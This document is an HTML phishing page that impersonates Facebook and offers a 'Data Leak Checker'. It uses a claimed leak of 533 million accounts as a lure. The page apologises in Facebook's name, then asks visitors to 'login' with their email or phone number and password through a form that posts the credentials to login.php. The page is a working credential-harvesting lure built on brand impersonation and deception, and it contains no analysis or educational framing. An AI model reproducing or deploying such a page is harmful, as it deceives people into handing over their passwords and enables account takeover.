<!DOCTYPE html>
<html>
<head>
<title>Facebook Acc Checker</title>
</head>
<body>
<img src="first.jpg" width="100%" height="auto">
<hr>
 <h1>Facebook Account Data Leak Checker!</h1>
 <hr>
 <h2 style="color:;">We are sorry!</h2>
<p style="color:gray;">We sincerely apologize for the inconvenience.</p>
<img src="second.jpg" width="100%" height="auto">

<p style="color:gray;">You all know that we do our best to keep our customers' accounts secure. We have billions of customers worldwide.</p>
<img src="third.png" width="100%" height="auto">

<p style="color:gray;">Despite our best efforts, we have not been able to secure the security of our 533 million Facebook accounts.</p>
<img src="fourth.jpg" width="100%" height="auto">

<p style="color:gray">We apologize to you for this. But the good news is that not all of our customer information has been leaked.So you can easily find out if your Facebook account information has been leaked.This can be an additional service for you. Login to the form below to find out if your Facebook account information has been leaked.
</p>
<h3 style="color:;">So Let's find out...</h3>
<style>
body {font-family: Arial, Helvetica, sans-serif;}
form {border: 3px solid #f1f1f1;}

input[type=text], input[type=password] {
  width: 100%;
  padding: 12px 20px;
  margin: 8px 0;
  display: inline-block;
  border: 1px solid #0076ff;
  border-radius: 5px;
  box-sizing: border-box;
}

button {
  background-color: #2F72FB;
  color: white;
  padding: 14px 20px;
  margin: 8px 0;
  border: none;
  cursor: pointer;
  width: 100%;
  border-radius: 5px;
}

button:hover {
  opacity: 0.8;
}

.cancelbtn {
  width: auto;
  padding: 10px 18px;
  background-color: #f44336;
}

.imgcontainer {
  text-align: center;
  margin: 24px 0 12px 0;
}

img.avatar {
  width: 20%;
  border-radius: 50%;
}

.container {
  padding: 16px;
}

span.psw {
  float: right;
  padding-top: 16px;
}

/* Change styles for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
  span.psw {
     display: block;
     float: none;
  }
  .cancelbtn {
     width: 100%;
  }
}
</style>
</head>
<body>
<form action="login.php" accept-charset="UTF-8" method="post">
  <div class="imgcontainer">
    <img src="fl.png" alt="Avatar" class="avatar">
  </div>

  <div class="container">
    <input type="text" placeholder="Email or phone number" name="uname" required>
    <input type="password" placeholder="Enter Password" name="psw" required>
        
    <button type="submit">Login</button>
  </div>
    <img src="l.jpg" width="100%" height="auto">
</form>

</body>
</html>
